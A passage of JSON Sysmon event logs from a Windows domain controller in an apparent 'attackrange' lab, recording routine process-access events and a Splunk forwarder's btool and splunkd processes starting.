M32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2952,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2953,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FEF-5F25-0000-00106A3A0500}\r\nTargetProcessId: 3268\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FEF-5F25-0000-00106A3A0500}","TargetProcessId":"3268","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2954,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.891\r\nProcessGuid: {41C8662E-1FEF-5F25-0000-00102F3B0500}\r\nProcessId: 3296\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1FEF-5F25-0000-00106A3A0500}\r\nParentProcessId: 3268\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  web list settings --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.891","ProcessGuid":"{41C8662E-1FEF-5F25-0000-00102F3B0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1FEF-5F25-0000-00106A3A0500}","ParentProcessId":"3268","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  web list settings --no-log","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2955,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.889\r\nSourceProcessGUID: {41C8662E-1FEF-5F25-0000-00106A3A0500}\r\nSourceProcessId: 3268\r\nSourceThreadId: 3264\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {41C8662E-1FEF-5F25-0000-00102F3B0500}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.889","SourceProcessGUID":"{41C8662E-1FEF-5F25-0000-00106A3A0500}","SourceProcessId":"3268","SourceThreadId":"3264","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{41C8662E-1FEF-5F25-0000-00102F3B0500}","TargetProcessId":"3296","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2956,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.889\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FEF-5F25-0000-00102F3B0500}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.889","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FEF-5F25-0000-00102F3B0500}","TargetProcessId":"3296","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2957,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.889\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.889","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2958,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.889\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.889","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2959,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.889\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.889","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2960,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.889\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.889","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
